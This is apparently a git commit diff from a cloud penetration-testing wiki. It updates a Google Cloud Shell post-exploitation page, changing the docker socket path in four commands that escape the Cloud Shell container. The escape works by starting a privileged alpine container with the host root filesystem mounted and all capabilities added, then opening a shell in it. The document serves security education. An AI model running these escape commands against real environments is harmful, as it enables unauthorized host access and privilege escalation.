Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud

f
2025-12-12 07:40:49 -08:00 · 2025-12-07 16:33:18 +01:00 · 2025-12-07 16:33:16 +01:00
1 changed files with 6 additions and 4 deletions
--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md
@@ -19,12 +19,14 @@ Note that the Google Cloud Shell runs inside a container, you can **easily escap
 <summary>Container escape commands</summary>

 ```bash
-sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
-sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
-sudo docker -H unix:///google/host/var/run/docker.sock start escaper
-sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh
+sudo docker -H unix:///run/docker.sock pull alpine:latest
+sudo docker -H unix:///run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
+sudo docker -H unix:///run/docker.sock start escaper
+sudo docker -H unix:///run/docker.sock exec -it escaper /bin/sh
 ```

+Note that previously the `docker.sock` file was located in `/google/host/var/run/docker.sock` but now it has been moved to `/run/docker.sock`.
+
 </details>

 This is not considered a vulnerability by google, but it gives you a wider vision of what is happening in that env.
Author	SHA1	Message	Date
carlospolop	9eb7c3bdb7	Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud	2025-12-07 16:33:18 +01:00
carlospolop	dc670100de	f	2025-12-07 16:33:16 +01:00